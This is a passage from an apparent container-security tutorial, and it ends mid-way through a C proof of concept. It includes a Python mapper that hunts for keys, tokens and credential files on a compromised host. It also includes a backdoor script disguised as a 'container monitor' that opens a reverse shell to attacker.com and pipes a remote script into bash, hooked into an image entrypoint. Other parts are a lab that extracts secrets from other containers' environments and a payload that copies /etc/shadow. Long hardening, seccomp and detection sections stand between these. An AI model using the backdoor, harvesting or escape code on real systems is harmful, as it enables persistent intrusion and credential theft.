                    images.append(image_info)
                except:
                    continue
        
        # Try using crictl for Kubernetes environments
        elif self.infrastructure["orchestration"]["name"] == "kubernetes":
            images_output = subprocess.getoutput("crictl images")
            image_lines = images_output.splitlines()[1:]  # Skip header
            
            for line in image_lines:
                parts = line.split()
                # crictl images output columns: IMAGE TAG "IMAGE ID" SIZE
                if len(parts) >= 4:
                    image_info = {
                        "repository": parts[0],
                        "tag": parts[1],
                        "id": parts[2],
                        "created": "unknown",
                        "size": parts[3]
                    }
                    images.append(image_info)
        
        self.infrastructure["images"] = images
    
    def map_networks(self):
        """Map all container networks."""
        networks = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            networks_output = subprocess.getoutput("docker network ls --format '{{json .}}'")
            for line in networks_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    network_data = json.loads(line)
                    network_id = network_data.get("ID", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker network inspect {network_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            network_info = {
                                "id": network_id,
                                "name": network_data.get("Name", "unknown"),
                                "driver": network_data.get("Driver", "unknown"),
                                "scope": network_data.get("Scope", "unknown"),
                                "subnet": "",
                                "gateway": "",
                                "containers": []
                            }
                            
                            # Extract subnet and gateway
                            if "IPAM" in inspect_data and "Config" in inspect_data["IPAM"]:
                                for config in inspect_data["IPAM"]["Config"]:
                                    if "Subnet" in config:
                                        network_info["subnet"] = config["Subnet"]
                                    if "Gateway" in config:
                                        network_info["gateway"] = config["Gateway"]
                            
                            # Extract connected containers
                            if "Containers" in inspect_data:
                                for container_id, container_data in inspect_data["Containers"].items():
                                    network_info["containers"].append({
                                        "id": container_id,
                                        "name": container_data.get("Name", "unknown"),
                                        "mac_address": container_data.get("MacAddress", "unknown"),
                                        "ipv4_address": container_data.get("IPv4Address", "unknown")
                                    })
                            
                            networks.append(network_info)
                    except:
                        # If inspect fails, add basic info
                        networks.append({
                            "id": network_id,
                            "name": network_data.get("Name", "unknown"),
                            "driver": network_data.get("Driver", "unknown"),
                            "scope": network_data.get("Scope", "unknown")
                        })
                except:
                    continue
        
        self.infrastructure["networks"] = networks
    
    def map_volumes(self):
        """Map all container volumes."""
        volumes = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            volumes_output = subprocess.getoutput("docker volume ls --format '{{json .}}'")
            for line in volumes_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    volume_data = json.loads(line)
                    volume_name = volume_data.get("Name", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker volume inspect {volume_name}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            volume_info = {
                                "name": volume_name,
                                "driver": volume_data.get("Driver", "unknown"),
                                "mountpoint": inspect_data.get("Mountpoint", "unknown"),
                                "created": inspect_data.get("CreatedAt", "unknown"),
                                "labels": inspect_data.get("Labels", {})
                            }
                            volumes.append(volume_info)
                    except:
                        # If inspect fails, add basic info
                        volumes.append({
                            "name": volume_name,
                            "driver": volume_data.get("Driver", "unknown")
                        })
                except:
                    continue
        
        self.infrastructure["volumes"] = volumes
    
    def scan_for_sensitive_files(self):
        """Scan for sensitive files on the host."""
        sensitive_files = []
        
        # List of paths to check
        paths_to_check = [
            "/etc/",
            "/root/",
            "/home/",
            "/var/lib/docker/",
            "/var/lib/kubelet/",
            "/var/lib/containerd/"
        ]
        
        # Patterns to look for
        patterns = [
            "*.key",
            "*.pem",
            "id_rsa",
            "*.password",
            "*.token",
            "credentials",
            "*.conf",
            "*.yaml",
            "*.json"
        ]
        
        # Build find command
        for path in paths_to_check:
            if not os.path.exists(path):
                continue
            
            pattern_args = []
            for pattern in patterns:
                pattern_args.append("-name")
                pattern_args.append(f'"{pattern}"')
            
            find_cmd = f"find {path} -type f \\( {' -o '.join(pattern_args)} \\) 2>/dev/null"
            files_output = subprocess.getoutput(find_cmd)
            
            for file_path in files_output.splitlines():
                if not file_path.strip() or not os.path.exists(file_path):
                    continue
                
                try:
                    stat_info = os.stat(file_path)
                    sensitive_files.append({
                        "path": file_path,
                        "size": stat_info.st_size,
                        "owner_uid": stat_info.st_uid,
                        "group_gid": stat_info.st_gid,
                        "permissions": oct(stat_info.st_mode)[-3:],
                        "last_modified": datetime.datetime.fromtimestamp(stat_info.st_mtime).isoformat()
                    })
                except:
                    continue
        
        self.infrastructure["sensitive_files"] = sensitive_files
    
    def map_host_services(self):
        """Map services running on the host."""
        services = []
        
        # Try using systemctl
        systemctl_output = subprocess.getoutput("systemctl list-units --type=service --all --no-pager")
        service_lines = systemctl_output.splitlines()
        
        # Skip header lines
        start_index = 0
        for i, line in enumerate(service_lines):
            if "UNIT" in line and "LOAD" in line:
                start_index = i + 1
                break
        
        # Parse service lines
        for line in service_lines[start_index:]:
            if "●" in line or "UNIT" in line or "LOAD" in line or line.strip() == "":
                continue
            
            parts = line.split()
            if len(parts) >= 3:
                service_name = parts[0]
                load_status = parts[1]
                active_status = parts[2]
                
                # Get detailed info
                service_info = {
                    "name": service_name,
                    "load_status": load_status,
                    "active_status": active_status,
                    "description": " ".join(parts[3:])
                }
                
                # Get additional details
                status_output = subprocess.getoutput(f"systemctl status {service_name} --no-pager")
                
                # Extract PID
                pid_match = re.search(r"Main PID: (\d+)", status_output)
                if pid_match:
                    service_info["pid"] = pid_match.group(1)
                
                # Extract binary path ("systemctl status" doesn't print ExecStart=; use "show" instead)
                exec_start = subprocess.getoutput(f"systemctl show -p ExecStart --value {service_name}").strip()
                if exec_start:
                    service_info["exec_start"] = exec_start
                
                services.append(service_info)
        
        self.infrastructure["services"] = services
    
    def map_infrastructure(self):
        """Map the entire container infrastructure."""
        print("[+] Starting infrastructure mapping")
        
        print("[+] Mapping containers")
        self.map_containers()
        
        print("[+] Mapping images")
        self.map_images()
        
        print("[+] Mapping networks")
        self.map_networks()
        
        print("[+] Mapping volumes")
        self.map_volumes()
        
        print("[+] Scanning for sensitive files")
        self.scan_for_sensitive_files()
        
        print("[+] Mapping host services")
        self.map_host_services()
        
        # Save results
        with open(self.output_file, "w") as f:
            json.dump(self.infrastructure, f, indent=2)
        
        print(f"[+] Infrastructure mapping complete. Results saved to {self.output_file}")

# Main execution
if __name__ == "__main__":
    mapper = InfrastructureMapper()
    mapper.map_infrastructure()

Container Backdoors

These backdoor techniques are particularly effective in containerized environments:

# Reverse shell script for container persistence
cat > /usr/local/bin/container_monitor.sh << 'EOF'
#!/bin/bash
# Container monitoring utility

while true; do
  # Try to connect back every hour
  /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' &
  
  # If that fails, try alternative method
  curl -s http://attacker.com/shell.sh | bash &
  
  # Sleep and try again
  sleep 3600
done
EOF
chmod +x /usr/local/bin/container_monitor.sh

# Add to image entrypoint
cat > /usr/local/bin/custom_entrypoint.sh << 'EOF'
#!/bin/bash
# Launch original entrypoint
/usr/local/bin/container_monitor.sh &
exec "$@"
EOF
chmod +x /usr/local/bin/custom_entrypoint.sh

Hands-On Challenge #9: Post-Escape Lab

Practice post-exploitation techniques in a containerized environment:

# Start a Docker host with multiple containers
docker run -d --name redis redis:latest
docker run -d --name mysql -e MYSQL_ROOT_PASSWORD=password mysql:5.7
docker run -d --name webapp -p 8080:80 nginx:latest

# Create a "compromised" container to practice with
docker run -it --name attacker --privileged ubuntu:20.04 bash

# From the attacker container, escape to the host
# Then practice:
# 1. Mapping all containers and their configurations
# 2. Accessing other container data
# 3. Establishing persistence
# 4. Extracting sensitive information
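
For steps 1, 2, and 4, a few host-side commands provide a quick start once you have escaped (a sketch; the container names match the lab containers started above):

# Enumerate containers and locate another container's data on disk
docker ps -a
docker inspect mysql --format '{{json .Mounts}}'
ls /var/lib/docker/overlay2/

# Pull injected secrets straight from another container's environment
docker inspect mysql --format '{{range .Config.Env}}{{println .}}{{end}}'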

Defending Against Container Escapes

Understanding container escape techniques puts us in a unique position to build effective defenses. Let's explore how to secure containerized environments against these attacks.

Security Best Practices

1. Container Configuration Hardening

# Run containers with the least privileges needed
docker run --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec \
  -v data-volume:/data:ro \
  nginx:latest

# Use user namespaces to remap root
# Add to /etc/docker/daemon.json:
{
  "userns-remap": "default"
}

# Limit resources to prevent DoS
docker run --memory=512m \
  --memory-swap=512m \
  --cpus=0.5 \
  --pids-limit=100 \
  nginx:latest

2. Never Run Privileged Containers

The single most important rule in container security:

# Instead of --privileged, add only the specific capabilities the workload needs
# (note: SYS_ADMIN is itself extremely powerful and should be granted only as a last resort)
docker run --cap-add=SYS_ADMIN \
  --cap-add=NET_ADMIN \
  ubuntu:20.04

# If you must mount devices, mount specific ones
docker run --device=/dev/fuse:/dev/fuse \
  ubuntu:20.04

3. Secure the Docker Socket

# Bind to Unix socket only (not TCP)
# Update /etc/docker/daemon.json
{
  "hosts": ["unix:///var/run/docker.sock"]
}

# Set proper permissions
sudo chmod 660 /var/run/docker.sock
sudo chown root:docker /var/run/docker.sock

# Never mount the socket into containers
# Instead of:
docker run -v /var/run/docker.sock:/var/run/docker.sock ...

# If a container truly needs the Docker API, front the socket with a filtering proxy instead
docker run -d --name socket-proxy \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -p 127.0.0.1:2375:2375 \
  tecnativa/docker-socket-proxy:latest

4. Use gVisor or Kata Containers for Enhanced Isolation

# Install gVisor (runsc)
curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/gvisor-archive-keyring.gpg] https://storage.googleapis.com/gvisor/releases release main" | sudo tee /etc/apt/sources.list.d/gvisor.list
sudo apt-get update && sudo apt-get install -y runsc

# Configure Docker to use gVisor
# Add to /etc/docker/daemon.json:
{
  "runtimes": {
    "runsc": {
      "path": "/usr/bin/runsc",
      "runtimeArgs": []
    }
  }
}

# Run container with gVisor
docker run --runtime=runsc nginx:latest

5. Implement and Enforce Security Policies

AppArmor profiles for Docker:

# Create an AppArmor profile
cat > /etc/apparmor.d/docker-nginx << 'EOF'
#include <tunables/global>

profile docker-nginx flags=(attach_disconnected, mediate_deleted) {
  #include <abstractions/base>
  #include <abstractions/nameservice>

  network inet tcp,
  network inet udp,
  
  deny mount,
  deny /proc/** rw,
  deny /sys/** rw,
  deny /root/** rw,
  
  /var/run/nginx.pid w,
  /usr/sbin/nginx ix,
  /etc/nginx/** r,
  /var/log/nginx/** w,
  /var/lib/nginx/** rw,
  /usr/share/nginx/** r,
  
  /dev/urandom r,
  /proc/sys/kernel/random/uuid r,
}
EOF

# Load the profile
sudo apparmor_parser -r -W /etc/apparmor.d/docker-nginx

# Run container with the profile
docker run --security-opt apparmor=docker-nginx nginx:latest

SELinux policies for containers:

# Enable SELinux in enforcing mode
setenforce 1

# Run container with SELinux options
docker run --security-opt label=type:container_t nginx:latest

# Allow specific volume mounts
docker run --security-opt label=type:container_t \
  -v /path/to/data:/data:z \
  nginx:latest

6. Seccomp Profiles

# Create a custom seccomp profile
cat > seccomp-nginx.json << 'EOF'
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": [
    "SCMP_ARCH_X86_64",
    "SCMP_ARCH_X86",
    "SCMP_ARCH_X32"
  ],
  "syscalls": [
    {
      "names": [
        "accept",
        "accept4",
        "access",
        "arch_prctl",
        "bind",
        "brk",
        "capget",
        "capset",
        "chdir",
        "chmod",
        "chown",
        "clock_getres",
        "clock_gettime",
        "clone",
        "close",
        "connect",
        "epoll_create",
        "epoll_create1",
        "epoll_ctl",
        "epoll_wait",
        "execve",
        "exit",
        "exit_group",
        "faccessat",
        "fadvise64",
        "fchdir",
        "fchmod",
        "fchown",
        "fcntl",
        "fdatasync",
        "flock",
        "fstat",
        "fstatfs",
        "fsync",
        "ftruncate",
        "futex",
        "getcwd",
        "getdents",
        "getdents64",
        "getegid",
        "geteuid",
        "getgid",
        "getgroups",
        "getpeername",
        "getpid",
        "getppid",
        "getpriority",
        "getrandom",
        "getresgid",
        "getresuid",
        "getrlimit",
        "getrusage",
        "getsockname",
        "getsockopt",
        "gettid",
        "gettimeofday",
        "getuid",
        "ioctl",
        "kill",
        "listen",
        "lseek",
        "lstat",
        "madvise",
        "memfd_create",
        "mkdir",
        "mmap",
        "mprotect",
        "mremap",
        "munmap",
        "nanosleep",
        "newfstatat",
        "open",
        "openat",
        "pipe",
        "pipe2",
        "poll",
        "prctl",
        "pread64",
        "prlimit64",
        "pwrite64",
        "read",
        "readlink",
        "readlinkat",
        "recvfrom",
        "recvmsg",
        "rename",
        "rmdir",
        "rt_sigaction",
        "rt_sigprocmask",
        "rt_sigreturn",
        "rt_sigsuspend",
        "sched_getaffinity",
        "sched_getparam",
        "sched_getscheduler",
        "sched_yield",
        "select",
        "sendfile",
        "sendmmsg",
        "sendmsg",
        "sendto",
        "set_robust_list",
        "set_tid_address",
        "setgid",
        "setgroups",
        "setitimer",
        "setpriority",
        "setresgid",
        "setresuid",
        "setsockopt",
        "setuid",
        "shutdown",
        "sigaltstack",
        "socket",
        "socketpair",
        "stat",
        "statfs",
        "sysinfo",
        "tgkill",
        "time",
        "times",
        "truncate",
        "uname",
        "unlink",
        "utimensat",
        "wait4",
        "waitid",
        "write",
        "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
EOF

# Run container with custom seccomp profile
docker run --security-opt seccomp=seccomp-nginx.json nginx:latest

Kubernetes Security Hardening

1. Pod Security Standards (PSS)

# Legacy example: PodSecurityPolicy (removed in Kubernetes 1.25; see the PSA note below)
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted
spec:
  privileged: false
  allowPrivilegeEscalation: false
  requiredDropCapabilities:
    - ALL
  volumes:
    - 'configMap'
    - 'emptyDir'
    - 'projected'
    - 'secret'
    - 'downwardAPI'
    - 'persistentVolumeClaim'
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    rule: 'MustRunAsNonRoot'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  fsGroup:
    rule: 'MustRunAs'
    ranges:
      - min: 1
        max: 65535
  readOnlyRootFilesystem: true

PodSecurityPolicy was deprecated in Kubernetes 1.21 and removed in 1.25; on current clusters, enforce the Pod Security Standards with Pod Security Admission (PSA) instead:

# Namespace with PSA labels
apiVersion: v1
kind: Namespace
metadata:
  name: secure-workloads
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
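
To confirm the labels actually bite, the Kubernetes documentation describes a server-side dry run that reports which existing pods in a namespace would violate the profile:

# Report (without changing anything) which pods in the namespace would violate "restricted"
kubectl label --dry-run=server --overwrite ns secure-workloads \
  pod-security.kubernetes.io/enforce=restricted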

2. Network Policies

# Default deny-all policy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

# Allow specific traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: api-allow
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: api
  policyTypes:
  - Ingress
  - Egress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: database
    ports:
    - protocol: TCP
      port: 5432

3. RBAC Hardening

# Restrictive Role example
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: production
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list"]

# Binding the role to a service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: production
subjects:
- kind: ServiceAccount
  name: monitoring-sa
  namespace: production
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

4. Admission Controllers

# OPA/Gatekeeper policy example
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: no-privileged-containers
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    excludedNamespaces: ["kube-system"]

Runtime Security Monitoring

1. Run-time Container Security Monitoring with Falco

# Install Falco with Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco

# Custom Falco rule for container escapes
- rule: Container Mount Sensitive Host Path
  desc: Detect attempts to mount sensitive host paths
  condition: >
    container and
    (container.image.repository != "falco" and
     container.image.repository != "sysdig") and
    mount and
    (mount.source startswith "/proc" or
     mount.source startswith "/var/run/docker.sock" or
     mount.source startswith "/etc" or
     mount.source startswith "/root" or
     mount.source startswith "/var/lib/kubelet" or
     mount.source startswith "/var/lib/docker")
  output: >
    Sensitive host path mounted in container (user=%user.name
    command=%proc.cmdline
    container_id=%container.id container_name=%container.name
    image=%container.image.repository source=%mount.source
    destination=%mount.dest)
  priority: WARNING
  tags: [container, runtime]

2. Implement File Integrity Monitoring

# Install AIDE (Advanced Intrusion Detection Environment)
apt-get update && apt-get install -y aide

# Configure AIDE to monitor critical directories
cat > /etc/aide/aide.conf.d/90_docker << 'EOF'
/var/lib/docker/overlay2 R
/usr/bin/docker NORMAL
/usr/bin/containerd NORMAL
/etc/docker NORMAL
/etc/containerd NORMAL
EOF

# Initialize the database
aide --init
mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# Set up a daily check
cat > /etc/cron.daily/aide-check << 'EOF'
#!/bin/sh
aide --check | mail -s "AIDE check report" root
EOF
chmod +x /etc/cron.daily/aide-check

3. Set Up Auditing

# Configure auditd to monitor container-related activities
cat > /etc/audit/rules.d/docker.rules << 'EOF'
# Monitor Docker daemon
-w /usr/bin/dockerd -p rwxa -k docker
-w /usr/bin/docker -p rwxa -k docker
-w /usr/bin/containerd -p rwxa -k docker
-w /usr/bin/crictl -p rwxa -k docker

# Monitor Docker configuration
-w /etc/docker/ -p rwxa -k docker_conf
-w /etc/containerd/ -p rwxa -k docker_conf

# Monitor Docker socket
-w /var/run/docker.sock -p rwxa -k docker_socket

# Monitor Docker containers
-w /var/lib/docker/ -p rwxa -k docker_containers
EOF

# Restart auditd
systemctl restart auditd

# Search audit logs for docker-related events
ausearch -k docker

Auto-Remediation Scripts

1. Detect and Kill Privileged Containers

#!/bin/bash
# security_monitor.sh - Monitor for privileged containers

while true; do
  # Find privileged containers
  echo "[*] Checking for privileged containers..."
  # Note: docker ps has no "label!=" filter, so check every container and whitelist approved ones downstream
  PRIVILEGED_CONTAINERS=$(docker ps -a --format '{{.ID}} {{.Names}}' | \
    xargs -I{} sh -c 'docker inspect --format="{{.HostConfig.Privileged}} {}" {} | grep "^true" || true')
  
  if [ ! -z "$PRIVILEGED_CONTAINERS" ]; then
    echo "[!] WARNING: Unauthorized privileged containers detected!"
    echo "$PRIVILEGED_CONTAINERS"
    
    # Notify administrators
    echo "[*] Sending notification..."
    echo "Unauthorized privileged containers detected: $PRIVILEGED_CONTAINERS" | \
      mail -s "SECURITY ALERT: Privileged Containers" admin@example.com
    
    # Stop containers (uncomment to enable auto-remediation)
    # echo "[*] Stopping unauthorized containers..."
    # echo "$PRIVILEGED_CONTAINERS" | awk '{print $2}' | xargs -I{} docker stop {}
  else
    echo "[*] No unauthorized privileged containers found."
  fi
  
  # Check for containers with Docker socket mounted
  echo "[*] Checking for containers with Docker socket mounted..."
  DOCKER_SOCKET_CONTAINERS=$(docker ps -a --format '{{.ID}} {{.Names}}' | \
    xargs -I{} sh -c 'docker inspect --format="{{range .Mounts}}{{if eq .Source \"/var/run/docker.sock\"}}VULNERABLE: {{end}}{{end}} {}" {} | grep "^VULNERABLE" || true')
  
  if [ ! -z "$DOCKER_SOCKET_CONTAINERS" ]; then
    echo "[!] WARNING: Unauthorized containers with Docker socket detected!"
    echo "$DOCKER_SOCKET_CONTAINERS"
    
    # Notify administrators
    echo "[*] Sending notification..."
    echo "Unauthorized Docker socket mounts detected: $DOCKER_SOCKET_CONTAINERS" | \
      mail -s "SECURITY ALERT: Docker Socket Mount" admin@example.com
    
    # Stop containers (uncomment to enable auto-remediation)
    # echo "[*] Stopping unauthorized containers..."
    # echo "$DOCKER_SOCKET_CONTAINERS" | awk '{print $2}' | xargs -I{} docker stop {}
  else
    echo "[*] No unauthorized Docker socket mounts found."
  fi
  
  sleep 300  # Run every 5 minutes
done

2. Detect Suspicious Kubectl Operations

#!/bin/bash
# k8s_security_monitor.sh - Monitor for suspicious Kubernetes operations

# Write an API server audit policy (the kube-apiserver must also be started with
# --audit-policy-file and --audit-log-path pointing at these locations for logs to appear)
mkdir -p /var/log/kubernetes/audit
cat > /etc/kubernetes/audit-policy.yaml << 'EOF'
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
  resources:
  - group: ""
    resources: ["pods/exec", "pods/attach", "secrets", "configmaps"]
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "clusterroles", "rolebindings", "clusterrolebindings"]
  - group: "apps"
    resources: ["deployments", "daemonsets", "statefulsets"]
EOF

# Function to check for suspicious kubectl commands
check_suspicious_commands() {
  # Look for pod exec commands (potential container escapes)
  KUBECTL_EXECS=$(grep "pods/exec" /var/log/kubernetes/audit/audit.log | grep -v "system:" | tail -n 20)
  
  if [ ! -z "$KUBECTL_EXECS" ]; then
    echo "[!] WARNING: Recent kubectl exec commands detected!"
    echo "$KUBECTL_EXECS"
    
    # Check for suspicious commands in exec
    for cmd in "mount" "chroot" "docker" "kubelet" "nsenter" "iptables" "ip link"; do
      SUSPICIOUS=$(echo "$KUBECTL_EXECS" | grep "$cmd")
      if [ ! -z "$SUSPICIOUS" ]; then
        echo "[!] ALERT: Potentially dangerous command '$cmd' executed in container!"
        echo "$SUSPICIOUS" | mail -s "SECURITY ALERT: Suspicious kubectl exec" admin@example.com
      fi
    done
  fi
  
  # Look for privilege escalation via RBAC changes
  RBAC_CHANGES=$(grep -E "roles|clusterroles|rolebindings|clusterrolebindings" /var/log/kubernetes/audit/audit.log | grep -v "system:" | tail -n 20)
  
  if [ ! -z "$RBAC_CHANGES" ]; then
    echo "[!] WARNING: Recent RBAC changes detected!"
    echo "$RBAC_CHANGES"
    echo "$RBAC_CHANGES" | mail -s "SECURITY ALERT: RBAC Changes" admin@example.com
  fi
}

# Run checks periodically
while true; do
  echo "[*] Checking for suspicious Kubernetes operations..."
  check_suspicious_commands
  sleep 600  # Run every 10 minutes
done

Defense in Depth Architecture

A multi-layered approach provides the best protection; a short example combining several of these layers follows the list:

  1. Host Hardening
    • Keep hosts updated
    • Minimize installed packages
    • Use SELinux/AppArmor
    • Enable seccomp
    • Implement host firewalls
  2. Container Isolation Enhancement
    • Use Kata Containers or gVisor
    • Implement strict cgroup limits
    • Never use privileged containers
    • Use read-only filesystems
  3. Network Segmentation
    • Implement network policies
    • Use service meshes for mTLS
    • Segment container networks
    • Apply egress filtering
  4. Access Controls
    • Least privilege RBAC
    • Just-in-time access
    • Separate admin credentials
    • Regular permission audits
  5. Monitoring and Detection
    • Runtime security monitoring
    • Behavioral analysis
    • Centralized logging
    • Alerting and auto-remediation
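
As a concrete illustration, here is a minimal sketch of a single Pod that combines several of these layers: non-root execution, no privilege escalation, all capabilities dropped, a read-only root filesystem, the runtime's default seccomp profile, and no auto-mounted service account token. A workload like this would also pass the restricted Pod Security Admission profile shown earlier.

# Minimal sketch: one Pod combining several defense-in-depth layers
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hardened-example
spec:
  automountServiceAccountToken: false
  containers:
  - name: app
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
    volumeMounts:
    - mountPath: /tmp
      name: tmp
  volumes:
  - name: tmp
    emptyDir: {}
EOF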

Vulnerability Management

# Scan container images for vulnerabilities
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy image nginx:latest

# Scan the images used by running containers (scan each image individually)
for img in $(docker ps --format '{{.Image}}' | sort -u); do
  docker run --rm -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy image "$img"
done

# Scan Kubernetes clusters
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/trivy-operator/main/deploy/manifests/trivy-operator.yaml
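
The same scan can gate a CI pipeline on severity; a small sketch, assuming Trivy's --exit-code and --severity flags (present in current releases):

# Fail the pipeline if HIGH or CRITICAL vulnerabilities are found
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
  aquasec/trivy image --exit-code 1 --severity HIGH,CRITICAL nginx:latest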

Hands-On Challenge #10: Defense Lab

Set up a secure container environment with defense in depth:

# Install gVisor
curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/gvisor-archive-keyring.gpg] https://storage.googleapis.com/gvisor/releases release main" | sudo tee /etc/apt/sources.list.d/gvisor.list > /dev/null
sudo apt-get update && sudo apt-get install -y runsc

# Configure Docker to use gVisor
sudo bash -c 'cat > /etc/docker/daemon.json << EOF
{
  "runtimes": {
    "runsc": {
      "path": "/usr/bin/runsc"
    }
  }
}
EOF'

# Restart Docker
sudo systemctl restart docker

# Create a hardened container
docker run --rm -d \
  --runtime=runsc \
  --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m \
  --name secure-nginx \
  -p 8080:80 \
  nginx:latest

# Now try to escape from this container
docker exec -it secure-nginx bash

Research and Zero-Day Development

Now that we've mastered existing escape techniques, let's explore the cutting edge: researching and developing new container escape methods.

The Container Vulnerability Research Process

After spending years on container security research, I've developed this methodology for finding new escape vectors:

  1. Understand the underlying technology deeply: Study the Linux kernel features, container runtime source code, and isolation mechanisms thoroughly.
  2. Map the attack surface: Identify all interfaces between container and host, both intended and unintended.
  3. Follow development closely: Monitor container runtime repositories, mailing lists, and issue trackers.
  4. Test new features aggressively: New features often introduce security issues before they're hardened.
  5. Look for unexpected interactions: Most zero-days come from unexpected interactions between components.

Source Code Auditing Techniques

To find zero-days, we need to dig into source code:

# Clone and analyze Docker source code
git clone https://github.com/moby/moby.git
cd moby

# Search for dangerous patterns in the code
grep -r "unsafe\." --include="*.go" .
grep -r "syscall\." --include="*.go" .
grep -r "exec\.Command" --include="*.go" .

# Look for privileged operations in runtimes
grep -r "privileged" --include="*.go" .
grep -r "CAP_SYS_ADMIN" --include="*.go" .

Focus on code that handles these critical areas (illustrative search patterns follow the list):

  1. Namespace transitions: Code that moves between namespaces
  2. Capability management: How capabilities are granted and dropped
  3. Volume mounting: File system interactions between host and container
  4. Network configuration: Especially interfaces shared with the host
  5. cgroup operations: Resource control mechanisms
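
For instance, the following grep patterns are rough, illustrative starting points for those five areas when auditing a Go-based runtime such as moby, containerd, or runc; the patterns are assumptions to adapt, not an exhaustive query set:

# Illustrative starting points, run from the runtime's source tree
grep -rn "setns\|unshare" --include="*.go" .          # 1. namespace transitions
grep -rn "Capabilities\|CapSet" --include="*.go" .    # 2. capability management
grep -rn "Mount(\|MS_BIND" --include="*.go" .         # 3. volume mounting
grep -rn "netlink\|veth" --include="*.go" .           # 4. network configuration
grep -rn "cgroup" --include="*.go" .                  # 5. cgroup operations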

Finding Hidden Attack Surfaces

Some of the most powerful container escapes come from overlooked attack surfaces:

1. Linux Pseudo-Filesystems

Beyond /proc and /sys, look at these often-overlooked interfaces:

# Check for debugfs access
ls -la /sys/kernel/debug/

# Look for tracefs
ls -la /sys/kernel/tracing/

# Check for securityfs
ls -la /sys/kernel/security/

2. Shared Memory Regions

# List all shared memory segments
ipcs -m

# Check for Docker-specific shared memory
ls -la /dev/shm/

# Look for namespace identifiers that might be shared
ls -la /proc/self/ns/

3. Abstract Unix Sockets

# List all abstract sockets (note the leading @)
netstat -xl | grep "@"

# Check for container runtime sockets
netstat -xl | grep -E "@docker|@containerd|@podman"

4. Extended BPF (eBPF) Subsystem

A promising area for new container escapes:

# Check if BPF JIT compilation is enabled (potential target)
cat /proc/sys/net/core/bpf_jit_enable

# List loaded BPF programs and maps (if bpftool is available)
bpftool prog list
bpftool map list

Developing a Custom runc Escape

Let's build a custom exploit for runc, the low-level container runtime:

// custom_runc_escape.c - Proof of concept for a hypothetical runc vulnerability
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>   /* for chmod() */
#include <sys/un.h>
#include <sys/mount.h>

// This is a simplified demonstration of developing a custom runc escape
// Actual exploits would target specific vulnerabilities

#define RUNC_SOCKET "/run/runc/runc.sock"
#define PAYLOAD "#!/bin/bash\ncp /etc/shadow /tmp/shadow && chmod 777 /tmp/shadow\n"

int main(int argc, char *argv[]) {
    printf("[+] Starting custom runc escape POC\n");
    
    // 1. Check for prerequisites
    if (access(RUNC_SOCKET, F_OK) == -1) {
        printf("[-] runc socket not found at %s\n", RUNC_SOCKET);
        return 1;
    }
    
    // 2. Create a payload file
    FILE *payload_file = fopen("/tmp/payload.sh", "w");
    if (!payload_file) {
